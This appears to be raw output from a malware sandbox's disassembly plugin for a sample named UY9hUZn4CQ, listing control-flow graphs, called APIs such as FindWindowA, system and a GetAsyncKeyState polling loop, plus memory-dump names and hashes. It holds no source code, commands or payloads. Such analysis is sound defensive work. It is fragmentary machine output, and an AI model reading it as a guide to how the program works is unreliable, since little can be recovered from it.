7ff60c4751c0 1318->1320 1322 7ff60c47d26c-7ff60c47d272 1319->1322 1323 7ff60c47d464-7ff60c47d473 FindWindowA 1319->1323 1320->1319 1324 7ff60c47d278-7ff60c47d41f 1322->1324 1325 7ff60c47d424-7ff60c47d42e 1322->1325 1326 7ff60c47d47a-7ff60c47d4a1 1323->1326 1327 7ff60c47d475 call 7ff60c4751c0 1323->1327 1324->1325 1328 7ff60c47d430-7ff60c47d462 1325->1328 1330 7ff60c47d4a7-7ff60c47d4ad 1326->1330 1331 7ff60c47d634-7ff60c47d643 FindWindowA 1326->1331 1327->1326 1328->1323 1328->1328 1332 7ff60c47d5f5-7ff60c47d5ff 1330->1332 1333 7ff60c47d4b3-7ff60c47d5f0 1330->1333 1334 7ff60c47d64a-7ff60c47d665 1331->1334 1335 7ff60c47d645 call 7ff60c4751c0 1331->1335 1336 7ff60c47d600-7ff60c47d632 1332->1336 1333->1332 1338 7ff60c47d66b-7ff60c47d813 1334->1338 1339 7ff60c47d819-7ff60c47d841 1334->1339 1335->1334 1336->1331 1336->1336 1338->1339
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindWindow
                                                                                                                                                                                                                                                                                      • String ID: OXH^<$YZQ^N=
                                                                                                                                                                                                                                                                                      • API String ID: 134000473-1594990384
                                                                                                                                                                                                                                                                                      • Opcode ID: 9060a954a274b016bb468f4149106f325249d676b24dbd92ad690b107e30c1ff
                                                                                                                                                                                                                                                                                      • Instruction ID: bb490da6a5b95793a227e132d9afbb910f7f752e6c138f398cde83ee0cf6f031
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9060a954a274b016bb468f4149106f325249d676b24dbd92ad690b107e30c1ff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A92E56BE3AB824EF703A63580134D4E6685FBB2C4361E327F850B5997FF5A71D24208

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1473 7ff60c47b26e-7ff60c47b288 1474 7ff60c47b28a-7ff60c47b2bb system 1473->1474 1475 7ff60c47b260-7ff60c47b26c 1473->1475 1476 7ff60c47b3c5-7ff60c47b3cf 1474->1476 1477 7ff60c47b2c1-7ff60c47b2ce 1474->1477 1475->1473 1479 7ff60c47b3d0-7ff60c47b402 1476->1479 1478 7ff60c47b2d0-7ff60c47b3b9 1477->1478 1478->1478 1480 7ff60c47b3bf-7ff60c47b3c3 1478->1480 1479->1479 1481 7ff60c47b404-7ff60c47b433 system 1479->1481 1480->1476 1480->1481 1482 7ff60c47b439-7ff60c47b43c 1481->1482 1483 7ff60c47b68f-7ff60c47b6c6 system 1481->1483 1484 7ff60c47b649-7ff60c47b66f 1482->1484 1485 7ff60c47b442-7ff60c47b644 1482->1485 1485->1484
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: `s|euE
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-1011817125
                                                                                                                                                                                                                                                                                      • Opcode ID: 16a44203d0a3327b2733e29470ef47f3e8289bc86360dc43936c80188cf60699
                                                                                                                                                                                                                                                                                      • Instruction ID: 8ed2a199029dcb744831b1ca8713547f4cae45fe25e036bd5e324798a9745ea5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16a44203d0a3327b2733e29470ef47f3e8289bc86360dc43936c80188cf60699
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BA1D56AE3AB864FF703963694120E8E264AFB71C8351E723FD1475953FF6572C24208

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1133592946-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 83692ced151abac59737cb022635283d056327a4ea541efc84f2bbe526ce32fb
                                                                                                                                                                                                                                                                                      • Instruction ID: 474f72db7821613a2e7ab2a160c98a5e1b5ebcbd4ab42ab90e10d638c72eeb07
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83692ced151abac59737cb022635283d056327a4ea541efc84f2bbe526ce32fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3312661E0C24281FA20AF25D411BBD6691BF45F8CFA44035EA4EC72E7DEEDE84D8394

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1400 7ff60c481830-7ff60c481864 1401 7ff60c481866-7ff60c481869 1400->1401 1402 7ff60c481870 1400->1402 1401->1402 1403 7ff60c48186b-7ff60c48186e 1401->1403 1404 7ff60c481872-7ff60c481882 1402->1404 1403->1404 1405 7ff60c48188b-7ff60c481897 1404->1405 1406 7ff60c481884-7ff60c48188a 1404->1406 1407 7ff60c48189d-7ff60c4818a5 1405->1407 1408 7ff60c481899-7ff60c48189b 1405->1408 1406->1405 1410 7ff60c4818a7-7ff60c4818aa 1407->1410 1411 7ff60c4818c6 1407->1411 1409 7ff60c4818c8-7ff60c4818ce 1408->1409 1414 7ff60c4818da-7ff60c4818ea 1409->1414 1415 7ff60c4818d0-7ff60c4818d5 1409->1415 1410->1411 1413 7ff60c4818ac-7ff60c4818c4 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ 1410->1413 1411->1409 1413->1409 1417 7ff60c4818ec 1414->1417 1418 7ff60c481921-7ff60c48193c ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1414->1418 1416 7ff60c48198d-7ff60c4819ab ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1415->1416 1419 7ff60c4819ad-7ff60c4819b6 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 1416->1419 1420 7ff60c4819b7-7ff60c4819c6 1416->1420 1421 7ff60c4818f0-7ff60c4818f3 1417->1421 1422 7ff60c481966-7ff60c481969 1418->1422 1423 7ff60c48193e 1418->1423 1419->1420 1425 7ff60c4819c8-7ff60c4819ce 1420->1425 1426 7ff60c4819cf-7ff60c4819e3 1420->1426 1421->1418 1427 7ff60c4818f5-7ff60c48190f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1421->1427 1424 7ff60c48196d-7ff60c48197d 1422->1424 1428 7ff60c481940-7ff60c481943 1423->1428 1424->1416 1425->1426 1430 7ff60c48191c-7ff60c48191f 1427->1430 1431 7ff60c481911-7ff60c48191a 1427->1431 1428->1424 1429 7ff60c481945-7ff60c48195f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1428->1429 1429->1422 1432 7ff60c481961-7ff60c481964 1429->1432 1430->1421 1431->1428 1432->1428
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00007FF821A66000,0000006E00000006,00000007,00007FF821A66010,00007FF60C4802AF), ref: 00007FF60C4818AF
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00007FF821A66000,0000006E00000006,00000007,00007FF821A66010,00007FF60C4802AF), ref: 00007FF60C481906
                                                                                                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00007FF821A66000,0000006E00000006,00000007,00007FF821A66010,00007FF60C4802AF), ref: 00007FF60C481933
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF60C481956
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00007FF821A66000,0000006E00000006,00000007,00007FF821A66010,00007FF60C4802AF), ref: 00007FF60C48199C
                                                                                                                                                                                                                                                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF60C4819A3
                                                                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF60C4819B0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1492985063-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ac0e317c4b0095696bef8ad304bee967d9962c9376d2039622231ca079f1129c
                                                                                                                                                                                                                                                                                      • Instruction ID: 046726b467806c38666a741013b863e76ba168cd614172ab42c7751a1b4a037d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac0e317c4b0095696bef8ad304bee967d9962c9376d2039622231ca079f1129c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B513532A08A4181EB608F19E480A7CA7A0FF85F99F658536CE5E877A0CF7DD44BC740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1434 7ff60c47f980-7ff60c47f9ba 1435 7ff60c47f9bc-7ff60c47f9c2 1434->1435 1436 7ff60c47f9c3-7ff60c47f9cf 1434->1436 1435->1436 1437 7ff60c47f9d5-7ff60c47f9dd 1436->1437 1438 7ff60c47f9d1-7ff60c47f9d3 1436->1438 1441 7ff60c47fa01 1437->1441 1442 7ff60c47f9df-7ff60c47f9e2 1437->1442 1440 7ff60c47fa03 1438->1440 1443 7ff60c47fa06-7ff60c47fa0c 1440->1443 1441->1440 1442->1441 1444 7ff60c47f9e4-7ff60c47f9ff ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ 1442->1444 1445 7ff60c47fad4-7ff60c47fb02 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1443->1445 1446 7ff60c47fa12-7ff60c47fa35 1443->1446 1444->1443 1449 7ff60c47fb04-7ff60c47fb0d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 1445->1449 1450 7ff60c47fb0e-7ff60c47fb1d 1445->1450 1447 7ff60c47fa37-7ff60c47fa3c 1446->1447 1448 7ff60c47fa70-7ff60c47fa8b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1446->1448 1451 7ff60c47fa92-7ff60c47fa97 1447->1451 1452 7ff60c47fa3e-7ff60c47fa41 1447->1452 1453 7ff60c47fa8e 1448->1453 1449->1450 1454 7ff60c47fb26-7ff60c47fb3a 1450->1454 1455 7ff60c47fb1f-7ff60c47fb25 1450->1455 1458 7ff60c47fa99-7ff60c47fa9c 1451->1458 1459 7ff60c47fac4 1451->1459 1456 7ff60c47fa6d 1452->1456 1457 7ff60c47fa43-7ff60c47fa6b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1452->1457 1453->1451 1455->1454 1456->1448 1457->1447 1458->1459 1461 7ff60c47fa9e-7ff60c47fac2 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 1458->1461 1459->1445 1461->1453
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47F9E7
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FA54
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FA7D
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF60C47FAAF
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(00007FF821A66000,?,0000006E00000006,?,?,00007FF60C472DAB), ref: 00007FF60C47FAF3
                                                                                                                                                                                                                                                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF60C47FAFA
                                                                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF60C47FB07
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2331969452-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d1fe3bd0b581d9c5feb69863657050d95ab157bc51dc8eea743e93e7db92dcc0
                                                                                                                                                                                                                                                                                      • Instruction ID: 6b89a72f0e3715d2b8826e53ab6500a8795e47537c0bc22547ba694dfae48dc7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1fe3bd0b581d9c5feb69863657050d95ab157bc51dc8eea743e93e7db92dcc0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B514132608A4186EF208F5DE590239A7A0FF84F99B658636CE5E877A0CF7DD44AD740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributeConsoleHandleText
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1363055914-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2af7c69abb0d5776f042da0160136c5efd3d304975bd17140449ca620e447c9
                                                                                                                                                                                                                                                                                      • Instruction ID: e57788b072ec7f1c3c55f1d7294762312acd2f9d2707002f1a7b459912dc61e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2af7c69abb0d5776f042da0160136c5efd3d304975bd17140449ca620e447c9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98113332614A5182E6209F52A41056DB361FB45FD4F640135DFAD57794DFBCE8998380

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Initialize_configthreadlocale_initialize_narrow_environment_initialize_onexit_table
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3623540455-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 39c21cf7fd7f22f6def2ca0c241b17e9c9ae3f558798462410a91c10ac4a06c4
                                                                                                                                                                                                                                                                                      • Instruction ID: f702a47c42545ae5485c39c45ecd914a975f52b6424d5391dca6cced86cbd3a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c21cf7fd7f22f6def2ca0c241b17e9c9ae3f558798462410a91c10ac4a06c4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52116A50E0814361FA587FB58452ABD0591BF81F4CFA00434E90ECA2E3EEECB84D43E2

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1537 7ff60c47e430-7ff60c47e44d 1538 7ff60c47e452-7ff60c47e46d call 7ff60c482858 1537->1538 1539 7ff60c47e44f 1537->1539 1542 7ff60c47e4bc-7ff60c47e4c7 1538->1542 1543 7ff60c47e46f-7ff60c47e48f 1538->1543 1539->1538 1544 7ff60c47e4dc 1542->1544 1545 7ff60c47e4c9-7ff60c47e4cc 1542->1545 1546 7ff60c47e4b1-7ff60c47e4ba 1543->1546 1547 7ff60c47e491-7ff60c47e49a 1543->1547 1550 7ff60c47e4e1-7ff60c47e4ff 1544->1550 1545->1544 1551 7ff60c47e4ce-7ff60c47e4d1 1545->1551 1546->1550 1548 7ff60c47e49c-7ff60c47e4a1 1547->1548 1549 7ff60c47e4a3-7ff60c47e4a8 1547->1549 1548->1550 1549->1546 1552 7ff60c47e4aa-7ff60c47e4af 1549->1552 1554 7ff60c47e51a-7ff60c47e51f 1550->1554 1555 7ff60c47e501-7ff60c47e504 1550->1555 1551->1544 1553 7ff60c47e4d3-7ff60c47e4d6 1551->1553 1552->1550 1553->1544 1558 7ff60c47e4d8-7ff60c47e4da 1553->1558 1556 7ff60c47e507-7ff60c47e519 call 7ff60c482bf0 1554->1556 1557 7ff60c47e521-7ff60c47e530 call 7ff60c47e3d0 1554->1557 1555->1556 1563 7ff60c47e534-7ff60c47e53e GetAsyncKeyState 1557->1563 1558->1550 1563->1563 1564 7ff60c47e540-7ff60c47e545 call 7ff60c474e40 1563->1564 1564->1563
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncState
                                                                                                                                                                                                                                                                                      • String ID: exists
                                                                                                                                                                                                                                                                                      • API String ID: 425341421-2996790960
                                                                                                                                                                                                                                                                                      • Opcode ID: 66b1913229fe3c1ab9839e917a97fba1d5f7cda5e2544d502db769bda7124f3b
                                                                                                                                                                                                                                                                                      • Instruction ID: 797b559dea316f93da4597dd38703ca7fddcdbe426a7ebb1c9d13eb06f579704
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66b1913229fe3c1ab9839e917a97fba1d5f7cda5e2544d502db769bda7124f3b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F431E031A086478AFB348A24940127A63A1FF8475CF304375DA4DC6B88DE6DE951AB40

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1567 7ff60c474e40-7ff60c474e8c 1568 7ff60c474fbb 1567->1568 1569 7ff60c474e92-7ff60c474ec8 1567->1569 1570 7ff60c474fc0-7ff60c474fe8 1568->1570 1571 7ff60c474ed0-7ff60c474fb3 1569->1571 1570->1570 1572 7ff60c474fea-7ff60c475034 system 1570->1572 1571->1571 1573 7ff60c474fb9 1571->1573 1574 7ff60c47515c-7ff60c475167 1572->1574 1575 7ff60c47503a-7ff60c475069 1572->1575 1573->1572 1577 7ff60c475170-7ff60c47519d 1574->1577 1576 7ff60c475070-7ff60c475151 1575->1576 1576->1576 1578 7ff60c475157-7ff60c47515a 1576->1578 1577->1577 1579 7ff60c47519f-7ff60c4751bf system 1577->1579 1578->1574 1578->1579
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d18100a821e6ad130914d6843aa68d877ab931c80410589bcf87ec29161c6965
                                                                                                                                                                                                                                                                                      • Instruction ID: 6da4147b57940fff2a2f08942c56f0fd138492daf74dc1a87112176bcb905391
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d18100a821e6ad130914d6843aa68d877ab931c80410589bcf87ec29161c6965
